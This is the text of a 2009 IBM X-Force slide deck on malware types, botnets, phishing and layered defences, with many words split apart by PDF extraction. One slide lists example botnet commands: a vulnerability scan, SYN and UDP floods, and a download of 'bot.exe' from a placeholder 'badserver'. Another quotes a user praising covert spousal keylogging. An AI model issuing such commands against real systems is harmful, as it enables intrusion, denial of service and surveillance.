View
1
Download
0
Category
Preview:
Citation preview
ISS –X-Force Professional Security Services
British Computing Society -October 22nd 2009
©2009 IBM Corporation
Malw
are
:Ju
st
Ho
w S
afe
are
Yo
u!
–Martin Overton
–Malware/Anti-M
alware SME
ISS X-Force –Professional Security Services
©2009 IBM Corporation
2British Computing Society -October 22nd 2009
Agenda �The Problem
–Malware, what it is and how it works
–Identity Theft, Bots, Extortion & Mules
�What can I do about it?
�Conclusions
�Questions
ISS X-Force –Professional Security Services
©2009 IBM Corporation
3British Computing Society -October 22nd 2009
Disclaimer
�Products named in this presentation are
used as examples only, and should not
be taken as any form
of endorsement by
IBM.
�All trademarks and copyrights are
acknowledged.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
4British Computing Society -October 22nd 2009
The Battlefield
�Y
ou
r C
om
pu
ter
•Computers are really, really
complex.
•We don’t have the foggiest idea
what our computers are doing
•So m
any targets, so little time
�Y
ou
r B
rain
•The weakest link in m
ost security
is the human being behind the
keyboard
ISS X-Force –Professional Security Services
©2009 IBM Corporation
5British Computing Society -October 22nd 2009
The Problem…Malware
ISS X-Force –Professional Security Services
©2009 IBM Corporation
6British Computing Society -October 22nd 2009
Definitions:-
�V
iru
s"A computer program that can infect other computer programs or
[system areas] by m
odifying them to include a copy (possibly modified)
of itself.”-Dr. Frederick Cohen, Computer Virus Theory & Experiments.
�T
roja
n“A Trojan Horse is a program that does something that its programmer
intended but the user is not expecting.”
“Viruses must replicate to be classed as viruses and Trojans don't
replicate.”
�W
orm
“A worm
is a program that makes copies of itself. It may do damage
and compromise the security of the computer, but it doesn't replicate by
changing a hosts code or files.”-“Viruses infect, worm
s infest”
�M
alw
are
*“Code that causes unwanted effects: Such as viruses, Trojans (including
Remote Access Trojans (RATS)), worm
s and the side-effects thereof.”
*Malicious Softw
are
ISS X-Force –Professional Security Services
©2009 IBM Corporation
7British Computing Society -October 22nd 2009
“Viruses are an 'Urban Myth', just like the
alligators that live in the New York
sewers.”
Peter Norton 1988
Definition:-Virus
ISS X-Force –Professional Security Services
©2009 IBM Corporation
8British Computing Society -October 22nd 2009
More Definitions:
�B
ackd
oo
r aka
RA
T:-“A program that is installed on a victims PC to
allow remote access and full control of the victims PC. They are
classified
as a sub-class of Trojans as they are frequently installed without the
knowledge of the victim”
–Think of it as a ‘remote control’for the victims computer!
�B
len
ded
th
reat:-“M
alware which use m
ultiple m
ethods (vectors) and
techniques (methodologies/exploits/payloads) to propagate and attack
systems and networks. (Also known as Cocktail Malware)”
–Examples include: CodeRedand family, Nimda, Goner, Gokar,
Scalper, Slapper, Klez, Yaha, etc
ISS X-Force –Professional Security Services
©2009 IBM Corporation
9British Computing Society -October 22nd 2009
0
100
200
300
400
500
600
700
Tota
l
Num
ber
of
Vir
uses
Thou
sand
s
1 9 8 6
1 9 8 7
1 9 8 8
1 9 8 9
1 9 9 0
1 9 9 1
1 9 9 2
1 9 9 3
1 9 9 4
1 9 9 5
1 9 9 6
1 9 9 7
1 9 9 8
1 9 9 9
2 0 0 0
2 0 0 1
2 0 0 2
2 0 0 3
2 0 0 4
2 0 0 5
2 0 0 6
2 0 0 7
2 0 0 8
2 0 0 9
Year
Kno
wn
Pre
dict
ed
Vir
us G
row
th -
Ru
nn
ing
To
tal
(by year: actual and predicted)
ISS X-Force –Professional Security Services
©2009 IBM Corporation
10
British Computing Society -October 22nd 2009
0
2000
0
4000
0
6000
0
8000
0
1000
00
1200
00
1400
00
1600
00
1800
00
Num
ber
of n
ew
Vir
uses
1 9 8 6
1 9 8 8
1 9 9 0
1 9 9 2
1 9 9 4
1 9 9 6
1 9 9 8
2 0 0 0
2 0 0 2
2 0 0 4
2 0 0 6
2 0 0 8
Year
Kno
wn
Pre
dict
ed
Vir
us G
row
th (
Actu
al)
(by year: actual and predicted)
ISS X-Force –Professional Security Services
©2009 IBM Corporation
11
British Computing Society -October 22nd 2009
The Changing Face of the Threat
�It was easy when everything
was a virus…
–File infectors
–Boot infectors
–Multipartile (File/Boot)
–Macro
–Script
�Now viruses are just one category of
Malware …
–Viruses
–Worm
s
–Trojans
–Backdoors
–Bots, Zombies
–Adware
–Spyware
–Blended Threats
–Applications, Security/Hacking Tools
–Key loggers
–Rootkits
ISS X-Force –Professional Security Services
©2009 IBM Corporation
12
British Computing Society -October 22nd 2009
Why create malware?
�N
ew
Mo
tivati
on
s:
–Theft of intellectual property,
personal data
–Extortion / blackmail
–Use stolen m
achines to
carry out attacks, send
spam, etc.
–Make m
oney, and lots of
it…
�T
yp
icall
y w
ritt
en
to
ord
er
by
pro
fessio
nal p
rog
ram
mers
fo
r p
rofe
ssio
nal
cri
min
als
…
�In
oth
er
wo
rds i
t is
no
w a
ll
ab
ou
t…
�O
ld M
oti
vati
on
s:
–Curiosity
–Malice or revenge
–Peer recognition
–Political or other causes
–Fame or infamy
–Boredom
–Anarchy
�T
yp
icall
y w
ritt
en
by a
teen
ag
e
male
…
ISS X-Force –Professional Security Services
©2009 IBM Corporation
13
British Computing Society -October 22nd 2009
How do they arrive or get on my PC?
�E
ma
il (
lin
ks
an
d a
ttac
hm
en
ts)
�W
eb
sit
es
(d
ow
nlo
ad
s, o
r via
ex
plo
its)
�In
sta
nt
Me
ssa
gin
g (
do
wn
loa
ds
, o
r via
e
xp
loit
s)
�S
oc
ial E
ng
ine
eri
ng
�S
oc
ial N
etw
ork
ing
(T
wit
ter,
Fac
eb
oo
k,
XIN
G, L
inked
In)
�U
SB
de
vic
es
(in
clu
din
g p
ho
ne
s a
nd
ip
od
s)
�W
ind
ow
s s
ha
res
, p
oo
r p
as
sw
ord
s,
ex
plo
its
�F
lop
py d
isc
s a
nd
in
fecte
d f
ile
s (
alm
os
t a
ny f
ile
typ
e n
ow
, in
clu
din
g P
DF
s!)
ISS X-Force –Professional Security Services
©2009 IBM Corporation
14
British Computing Society -October 22nd 2009
What do they do on, and to my PC?
�In
sta
ll t
hem
selv
es
�O
ften
dis
ab
le s
ecu
rity
to
ols
in
pla
ce (
an
ti-m
alw
are
&
pers
on
al
fire
wall
)
�In
vit
e o
ther
malc
od
e i
n t
o p
art
y o
n y
ou
r P
C
�S
teal
data
(cre
dit
card
in
form
ati
on
, b
an
k d
eta
ils,
so
ftw
are
keys
, etc
.)
�In
sta
ll a
backd
oo
r to
all
ow
rem
ote
ac
ces
s/c
on
tro
l
�L
oo
k f
or
oth
er
syste
ms t
o i
nfe
ct
�Jo
in a
bo
tnet
�S
en
d S
pam
, p
art
icip
ate
in
a D
Do
Satt
ack,
ho
st
Ph
ish
ing
o
r M
alw
are
files o
r w
eb
sit
e, u
sed
to
sto
re s
tole
n o
r il
leg
al
mate
rial,
an
d s
o o
n…
�D
ele
te f
iles,
reg
istr
y k
eys,
form
at
the H
D,
co
rru
pt
file
s,
ho
ld f
iles t
o r
an
so
m…
ISS X-Force –Professional Security Services
©2009 IBM Corporation
15
British Computing Society -October 22nd 2009
Latest Stats
�2
33
% g
row
th in
th
e n
um
be
r o
f m
alic
iou
s s
ite
s in
th
e la
st
six
m
on
ths
an
d a
67
1%
gro
wth
du
rin
g t
he la
st
ye
ar.
�7
7%
of
We
b s
ite
s w
ith
ma
lic
iou
s c
od
e a
re le
git
ima
te s
ite
s
that
ha
ve
be
en
co
mp
rom
ise
d.
�9
5%
of
co
mm
en
ts t
o b
log
s, c
hat
roo
ms
an
d m
ess
ag
e b
oard
s
are
sp
am
or
ma
lic
iou
s.
�5
7%
of
da
ta-s
tea
lin
g a
ttac
ks
are
co
nd
uc
ted
ove
r th
e W
eb
.
�8
5.6
% o
f a
ll u
nw
an
ted
em
ails
in
cir
cu
lati
on
co
nta
ine
d lin
ks
to
sp
am
sit
es
an
d/o
r m
alic
iou
s W
eb
sit
es
.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
16
British Computing Society -October 22nd 2009
Virus Payload Animations
ISS X-Force –Professional Security Services
©2009 IBM Corporation
17
British Computing Society -October 22nd 2009
Other Virus Screenshots
ISS X-Force –Professional Security Services
©2009 IBM Corporation
18
British Computing Society -October 22nd 2009
ISS X-Force –Professional Security Services
©2009 IBM Corporation
19
British Computing Society -October 22nd 2009
Swen
ISS X-Force –Professional Security Services
©2009 IBM Corporation
20
British Computing Society -October 22nd 2009
CodeRedSpread
ISS X-Force –Professional Security Services
©2009 IBM Corporation
21
British Computing Society -October 22nd 2009
The Slammer Worm
�E
xp
loit
ed
a w
ell
-kn
ow
n W
ind
ow
s b
ug
fo
r w
hic
h a
patc
h a
lread
y
exis
ted
�If
a v
uln
era
ble
bo
x r
eceiv
es a
sin
gle
in
fecte
d 3
76-b
yte
packet,
it
beco
mes i
nfe
cte
d
�O
nce a
mach
ine i
s i
nfe
cte
d, it
uses a
ll a
va
ilab
le b
an
dw
idth
to
fir
e
ou
t in
fecte
d p
ackets
to
ran
do
m a
dd
resses
–100 M
b connection = 30,000 infected packets per second
�M
ost
vu
lnera
ble
mach
ines i
nfe
cte
d w
ith
in t
en
min
ute
s
�S
lam
mer
carr
ied
no
paylo
ad
–Mayhem caused by the traffic levels it generated
•Brought down ATM m
achines
•Grounded airliners
•Caused power outages (allegedly)
ISS X-Force –Professional Security Services
©2009 IBM Corporation
22
British Computing Society -October 22nd 2009
Slammer Spread
ISS X-Force –Professional Security Services
©2009 IBM Corporation
23
British Computing Society -October 22nd 2009
Converged Threat –Conficker (aka Downadup)
ISS X-Force –Professional Security Services
©2009 IBM Corporation
24
British Computing Society -October 22nd 2009
Linux Viruses
�F
as
test
gro
win
g o
pera
tin
g s
ys
tem
–Linux OS gaining popularity
–Increased Linux deployment
�L
inu
x v
iru
s g
row
th in
cre
as
e
–50 known viruses in 2001
–Over 5,000 current known viruses
(source:TrendMicro)
�P
rote
cti
on
mo
re c
om
ple
x t
ha
n W
inX
X
–OS kernel level consistency (RTS)
–AV vendor reluctance to support multiple and
easily modified kernels
ISS X-Force –Professional Security Services
©2009 IBM Corporation
25
British Computing Society -October 22nd 2009
OSX/Leap-A aka OSX/Ooompa-A
�Infects Mac OS X Operating
System.
�The worm
makes use of the
Spotlight search program,
included in OSX, and will run
each time the machine boots.
�Uses iChatto send the
infected file –latestpics.tgz–
to all contacts on the infected
user’s buddy list.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
26
British Computing Society -October 22nd 2009
Instant Messaging & Internet Relay Chat
�Many m
alware now include IM as an infection vector
�Most use port 80, which is next to impossible to restrict
unauthorized outbound traffic.
�Many bots now spread via IM.
�Bypasses Gateway AV.
�Vulnerable to hackers.
�Weak (or no) encryption.
�Mainly rely on Social-Engineering
ISS X-Force –Professional Security Services
©2009 IBM Corporation
27
British Computing Society -October 22nd 2009
Mobile/Cabir
�This proof-of-concept worm
spreads
through BLUETOOTH-enabled
devices.
�When it arrives, a series of messages
appear. These messages warn the
user of the possible m
alicious nature
of the file before finally being
installed.
This worm
has its Product ID set to
(0x101F6F88), which basically
targets Series 60 v0.9. The said
setting is the m
ost common and
conservative choice for a basic
application because it is compatible
to all existing Series 60 devices.
Marib–Cabirwith M
MS functionality
too…
Some Series 60 devices are as follows:
Phones based on Nokia Series 60 Developer Platform
2.0 (Nokia 7610,
Nokia 6620, Nokia 6600, Panasonic X700)
Phones based on Nokia Series 60 Developer Platform
1.0
(Nokia 7650, Nokia 3650, 3600, Nokia 3660, 3620, Nokia N-
Gage, Siemens SX1, SendoX)
ISS X-Force –Professional Security Services
©2009 IBM Corporation
28
British Computing Society -October 22nd 2009
Dutsaka Dust
�This proof-of-concept virus is a parasitic file
infector. It is the first known virus for the PocketPC
platform
. Dutsaffects ARM-based devices only.
targets W
indows CE / PocketPC devices.
�Dutscontains two m
essages that are not
displayed:
“This is proof of concept code. Also, i wanted to
make avers happy. The situation when Pocket PC
antivirusesdetect only EICAR file had to end ...”
�The other one is a reference to the science-fiction
book Perm
utation City by Greg Egan, where the
virus got its intended name from: “This code arose
from the dust of Perm
utation City “
ISS X-Force –Professional Security Services
©2009 IBM Corporation
29
British Computing Society -October 22nd 2009
More Definitions:
�S
pyw
are
:-the generic name for any application that may track your
online and/or offline PC activity and is capable of locally saving or
transmitting those findings for third parties sometimes with butmore
often without your knowledge or consent.
–Spyware comes in many form
s including adware, key
loggers, Trojans, browser hijackers, and diallers.
�K
eylo
gg
er:
-a type of system m
onitor that has the ability to record all
keystrokes on your computer. Therefore, a keyloggercan record and
log your e-m
ail conversations, chat room conversations, instant
messages, and any other typed m
aterial. They have the ability torun in
the background, hiding their presence.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
30
British Computing Society -October 22nd 2009
Spyware -Key Logger -Example
What a great program!
This was just an outstanding program. I’ve had no problems with it
running, and had no problems installing it. This program ran inthe
background under stealth m
ode and let m
e catch m
y cheating husband
in the act of sending emails and instant messages to his m
istress. He
never even suspected the program was on the computer.
I highly recommend this program if, like me, you are looking to catch
a two-tim
ing rat. W
e are now divorced, and needless to say, the
program has paid for itself m
any, many tim
es over.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
31
British Computing Society -October 22nd 2009
Malware extortion
ISS X-Force –Professional Security Services
©2009 IBM Corporation
32
British Computing Society -October 22nd 2009
Definitions:-
�Bot •'Bot' is a contracted (truncated or short) name for a software robot.
A bot is a piece of software that allows a system to be remotely
controlled without the owner’s knowledge; it can also be used to
automate common tasks such as on IRC aka drone or zombie.
�Botnet
•A group ['Herd' or 'Network'] of Zombie systems controlled by the
'Bot Herder’. These botnets are told what to do by the botnet owner.
This can be anything that the bot has been programmed to
do....including updating itself or installing new malicious software.
�Bot Herder
•The person [or group] which “own”and control a herd of bots. Also
known as the Bot Master aka Zombie Master.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
33
British Computing Society -October 22nd 2009
Definitions:-
�DDoS[aka Distributed Denial of Service]
–A distributed denial-of-service attack is an attack on a
computer system or network from multiple co-ordinated
systems connected to the same network which are
perform
ing a denial of service attack.
�IRC –“Internet Relay Chat (IRC) is a form
of instant
communication over the Internet. It is mainly designed for
group (many-to-m
any) communication in discussion forums
called channels, but also allows one-to-one communication.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
34
British Computing Society -October 22nd 2009
Infection/Propagation M
ethods
Vulnerabilities, e.g. RPC, DCOM, LSASS, MSSQL
Dictionary attack, Open W
indows Shares [SMB]
E-m
ail, Mytob, Bagle, Mitgleider, etc.
Existing Backdoor, Bagle, Mydoom, etc.
Download from website via dropper [e-m
ail or Instant Messaging]
Update or install new components from website or ftp server
Update M
ethods
Peer 2 Peer File Sharing.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
35
British Computing Society -October 22nd 2009
IRC
Server
Bot Herder
Re
po
rt f
or
Du
ty
Once infected the bot signs
in to the IRC servers
dedicated ‘bot’channel for
instructions.
Exa
mp
le ‘
bo
tne
t’c
om
ma
nd
s
Sca
n f
or
mo
re v
icti
ms
to
pre
ss
-ga
ng
in
to s
erv
ice:
Advscan
lsass
200 5 0 –b
Up
da
te t
he
‘b
ot’
so
ftw
are
:http.updatehttp://badserver/bot.exe
c:\msupdate.exe1
Att
ac
k!
Ddos.syn
xxx.xxx.xxx.xxx
80 900
Udp
xxx.xxx.xxx.xxx.xxx
20000 100000 10
Sp
am
, S
pa
m,
Sp
am
…Spam.setlist
Spam.settemplate
Spam.start
Se
nd
Ord
ers
All bots connected to the
IRC servers dedicated ‘bot’
channel receive and carry
out the instructions.
DNS
Server
ISS X-Force –Professional Security Services
©2009 IBM Corporation
36
British Computing Society -October 22nd 2009
Bot Herder
Botnet
Scan and ‘Sploit
Victim
DDoS
Victim
Spam, 419, or
Phishing
Victim
Malware
or
Dropper
DNS
Server
IRC
Server
ISS X-Force –Professional Security Services
©2009 IBM Corporation
37
British Computing Society -October 22nd 2009
Size of the Problem
�T
he
Ho
ne
yn
et
pro
ject
en
titl
ed
: “K
no
w y
ou
r E
ne
my:
Tra
ck
ing
Bo
tne
ts”
•Logged 226,585 unique IP addresses logging into one of
the IRC botnet C&C channels.
•Botnets ranged in size from several hundred ‘zombies’to
more than 50,000 ‘zombies’.
•They observed 226 DDoSattacks against 99 unique
targets.
•Typical size of a botnet: 2000+ bots [‘zombies’].
•From this data they worked out that the number of bots
required to successfully DDoSa typical company were just
13. This assumes that the company is on a T1 [1.544Mbit]
and that each ‘zombie’has a 128Kbit link [128Kbit x 13 =
1.664Mbit].
ISS X-Force –Professional Security Services
©2009 IBM Corporation
38
British Computing Society -October 22nd 2009
Definition:-Phishing
�The art of using social engineering to
encourage the user to divulge inform
ation
�The user receives an email directing them
to a website which looks official, but isn’t!
�The user is encouraged to enter account
details, passwords etc.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
39
British Computing Society -October 22nd 2009
ISS X-Force –Professional Security Services
©2009 IBM Corporation
40
British Computing Society -October 22nd 2009
The Darker Side Of Phishing
�R
ec
en
tly p
his
hin
g s
ca
ms h
ave
mo
ve
d o
n f
rom
sim
ply
ste
alin
g y
ou
r b
an
k d
eta
ils
to
in
sta
llin
g m
alw
are
on
yo
ur
PC
!
ISS X-Force –Professional Security Services
©2009 IBM Corporation
41
British Computing Society -October 22nd 2009
Mules
�W
hy s
tore
th
ing
s o
n m
y c
om
pu
ter,
wh
en
I c
an
sto
re
the
m o
n y
ou
rs?
–Broadband makes this feasible
–Easy to do with a Trojan
ISS X-Force –Professional Security Services
©2009 IBM Corporation
42
British Computing Society -October 22nd 2009
Identity and IP Theft
�Id
en
tity
is
eas
y t
o s
tea
l
–Given access to a m
achine
–All your life is there!
–Very hard to recover from
�T
he
ft o
f c
orp
ora
te d
ata
[In
telle
ctu
al P
rop
ert
y]
–Sold to your competitors
–Beat you to the sale
–Copy/Steal your product
designs, etc.
�T
oo
ls –
Tro
jan
, s
pyw
are
, k
ey
log
ge
r, b
ot
ISS X-Force –Professional Security Services
©2009 IBM Corporation
43
British Computing Society -October 22nd 2009
Attack Sophistication Increases W
hile Intruder
Sophistication Decreases
�M
eta
-Eve
nts
he
lp id
en
tify
mu
lti-
eve
nt
too
l b
ase
d a
tta
ck
s
HIG
H
LO
W
Att
ack
So
ph
isti
cati
on
LO
W
HIG
H
Intr
ud
er
So
ph
isti
cati
on
ISS X-Force –Professional Security Services
©2009 IBM Corporation
44
British Computing Society -October 22nd 2009
Th
reat
Co
nverg
en
ce
Rep
lacin
g T
hre
at
Evo
luti
on
�Threat Evolution:
–A flat world has brought
about an unprecedented
amount of criminals and cons
–Attackers keep ROI in mind
as well, and constantly
evolve their wares in order to
re-purpose it for the next
flood of attacks
–High profile vulnerabilities will
still be the vehicles for new
attacks, however, the low
and slow attack vectors
cannot be ignored
–The economics of
exploitation must be taken
into consideration to better
prioritize risk
ISS X-Force –Professional Security Services
©2009 IBM Corporation
45
British Computing Society -October 22nd 2009
Wh
at
can
I d
o a
bo
ut
it?
ISS X-Force –Professional Security Services
©2009 IBM Corporation
46
British Computing Society -October 22nd 2009
Anti-M
alware Strategy
�Malware/Spyware/RootkitScanners are ONLY as
good as their LAST UPDATE.
�No 100% solution
•“Anyone that tells you that their product offers
100% protection from viruses are either naïve or
just don’t fully understand the real problem.”
�Best you can expect is 98%, but only if you design
and implement your approach properly.
�Implement a multi-layered defence!
ISS X-Force –Professional Security Services
©2009 IBM Corporation
47
British Computing Society -October 22nd 2009
Multi-layered Anti-M
alware
What’s That?
�L
ike
an
On
ion
…
–E-M
ail was responsible
for at least 80% of all
malware outbreaks.
–Web filtering/scanning
can block many attacks.
–Updating a few
perimeter machines can
stop new malware from
gaining a beach head.
Personal
Computers
Firewall/Proxy Server
Web Scanning/Mail
Scanning
File/Print Servers
ISS X-Force –Professional Security Services
©2009 IBM Corporation
48
British Computing Society -October 22nd 2009
Solutions –Tools and Technologies
�A
nti
-Vir
us
–Too many to list
�A
nti
-Ro
otk
itT
oo
ls
–ChkRootkit[*NIX -http://chkrootkit.org/]
–RootkitHunter [*NIX -
http://www.rootkit.nl/projects/rootkit_hunter.html]
–RootkitRevealer[W
intel -
http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.
shtml]
–UnHackme[W
intel -http://greatis.com/unhackme/]
–Blacklight[W
intel -http://www.f-secure.com/blacklight/]
�P
ers
on
al
Fir
ew
all
s
–Too many to list
–Can block internet access to untrustedexecutables –
assuming the malware hasn’t already disabled it!
ISS X-Force –Professional Security Services
©2009 IBM Corporation
49
British Computing Society -October 22nd 2009
Solutions –Tools and Technologies -Other
�H
on
eyp
ots
an
d H
on
eyn
ets
�ID
S a
nd
IP
S
�P
eri
mete
r fi
rew
alls
�P
art
itio
nin
g y
ou
r n
etw
ork
wit
h r
ou
ter
AC
Ls
an
d in
tern
al fi
rew
alls
�P
atc
h m
an
ag
em
en
t
�S
tro
ng
pa
ssw
ord
s
“In other words, stop them getting onto your systems in the firstplace,
and if they do get in, slow them down,
or increase your ability for early detection.”
ISS X-Force –Professional Security Services
©2009 IBM Corporation
50
British Computing Society -October 22nd 2009
Applying a Multi-layered Anti-M
alware Personal
Computers
Firewall/Proxy Server
Web Scanning/Mail
Scanning
File/Print Servers
AV Vendor 1
IDS
AV Vendor 2
Content Filtering/Generic
Blocking/Filtering
Kernel Wrappers (Entercept)
Intrusion Prevention Systems
(IntruShield)
AV Vendor 3
Personal Firewalls
Personal IDS
Behaviour Blockers/Sandbox
Integrity Management
PacketShapers(QoS/Packeteer)
NetFlow(Cisco)
Layer 7 Switches
Centralised remote patching of
allsystems
Backups
SMB-Lures, Tarpits, Honeypots, Honeynets,
BillyGoats
Policies and Procedures
Managed Service
ISS X-Force –Professional Security Services
©2009 IBM Corporation
51
British Computing Society -October 22nd 2009
Putting it all together…
…
Malw
are
Sen
so
rs
SMB-Lures, Tarpits, Honeypots,
Honeynets, BillyGoats
Mu
ltip
le A
nti
vir
us V
en
do
rs
Workstation
Servers
Perimeter (W
eb, FTP and SMTP)
IDS
Using custom m
alware
rules/signatures
Au
tom
ate
d P
atc
hin
g
Centralised remote patching of all
systems via Tivoli, SMS, etc.
Man
ag
em
en
t
Centralised, Geo-centric,
or at least country-centric
Policies (What we want to achieve)
Procedures (How we are going to achieve it)
People (Who’s going to do it)
Products (The technology bit)
Oth
ers
Kernel Wrappers (Entercept)
Personal Firewalls (McAfee/ZoneLabs)
Personal IDS (Blackice)
Generic Blocking/Filtering
Heuristics
Backups
Intrusion Prevention Systems (IntruShield)
Behaviour Blockers/SandBoxTechnology
(FinJanSurfinShield)
Firewalls/Proxies
PacketShapers(QoS/Packeteer)
NetFlow(Cisco)
Layer 7 Switches
Managed e-m
ail virus scanning, anti-spam
service
ISS X-Force –Professional Security Services
©2009 IBM Corporation
52
British Computing Society -October 22nd 2009
The Best Defence –
End User
�R
eg
ula
rly r
un
a m
alw
are
sc
an
–Keep your anti-m
alware product up-
to-date
�In
sta
ll f
irew
all c
od
e, a
nti
-sp
yw
are
a
nd
an
ti-r
oo
tkit
too
ls
�D
on
’t r
un
Pe
er
to P
ee
r s
oft
ware
�K
ee
p u
p t
o d
ate
wit
h s
ecu
rity
p
atc
he
s
�L
ea
rn a
bit
mo
re a
bo
ut
yo
ur
co
mp
ute
r
–Never, ever run anything you’ve
downloaded or received unless
you’re pretty confident of its source
–Download some tools
–Think!
ISS X-Force –Professional Security Services
©2009 IBM Corporation
53
British Computing Society -October 22nd 2009
Conclusions…
�Malware is here to stay.
�The problem is going to get worse.
•4-7000+ new m
alware every m
onth. January 2008 was over
13,000!
•More W
orm
s, Bots, Trojans and ‘Blended Threats’appearing.
•Becoming m
ore stealthy and rely m
ore on Social-engineering.
•For profit, no longer for fun…
�More than 600,000 viruses by the end of 2009?
�No m
atter what tricks the m
alware writers use the AV industry will
neutralise it.
–E
ven
tuall
y!
�AV is only one small but important part of an overall anti-m
alware
solution.
�Technology is a small part of an overall solution, user behaviour and
proper security controls m
ust be addressed.
ISS X-Force –Professional Security Services
©2009 IBM Corporation
54
British Computing Society -October 22nd 2009
Not all computer problems are caused by m
alware…
ISS X-Force –Professional Security Services
©2009 IBM Corporation
55
British Computing Society -October 22nd 2009
Questions?
ISS X-Force –Professional Security Services
©2009 IBM Corporation
56
British Computing Society -October 22nd 2009
Contact details…..
Mart
in O
vert
on
EM
EA
Malw
are
/An
ti-M
alw
are
SM
E
IBM
IS
S X
-Fo
rce –
PS
S
�E
-Ma
il:
ove
rto
nm
@u
k.ib
m.c
om
�T
ele
ph
on
e:
+44
(0)2
39
25
63
442
�M
ob
ile:
+44
(0)7
76
46
66
939
ISS X-Force –Professional Security Services
©2009 IBM Corporation
57
British Computing Society -October 22nd 2009
Useful sites
�Anti-Virus (On-line scanners)
�http://housecall.trendmicro.com/
�http://us.mcafee.com/root/mfs/default.asp
�Links to FREE AV, Personal Firewalls and Anti-Spyware tools
�http://momusings.co.uk/software.aspx
�Recommended Books
�Viruses Revealed (Harley, Slade, Gattiker) –
ISBN 0-07-213090-3
�Hacking Exposed (Scambray, McClure, Kurtz) –ISBN 0-07-212748-1
�Site related to ‘spoof’or ‘rogue’anti-spyware tools.
�http://www.spywarewarrior.com/rogue_anti-spyware.htm
ISS X-Force –Professional Security Services
©2009 IBM Corporation
58
British Computing Society -October 22nd 2009
Useful sites…cont.
�Hoax, Scam, urban Legend Reference Sites
�http://cluestick.me.uk
�http://snopes.com
�Papers and articles I’ve written
�http://momusings.com/papers
�My Personal ‘Blog’
�http://momusings.com/momusings
�http://momusings.com/vsub
ISS X-Force –Professional Security Services
©2009 IBM Corporation
59
British Computing Society -October 22nd 2009
Background
�S
un
All
ian
ce /
Ro
ya
l an
d S
un
All
ian
ce
–Joined 1988
–Commissioning PCs, Strategy (hardware and software)
–Responsible for Malware Research/Prevention (10 years)
–Ethical Hacker (2.5 years)
–Helped set up Independent ISS UK User Group
–WildListreporter, Charter member of AVIEN
�O
uts
ou
rced
Ap
ril
2002
–Joined EMEA IGS Security June 2002 as Malware/Anti-M
alware SME
–Moved to M
SSD (EMEA) June 2004 to set up EMEA Virus CERT
–Member of Global Virus CERT
–Lead Computer Forensics Analyst for EMEA
–Moved to ISS X-Force Professional Security Services April 2008
�21 Y
ears
of
kn
ow
led
ge o
n m
alw
are
an
d r
ela
ted
secu
rity
th
rea
ts.
Recommended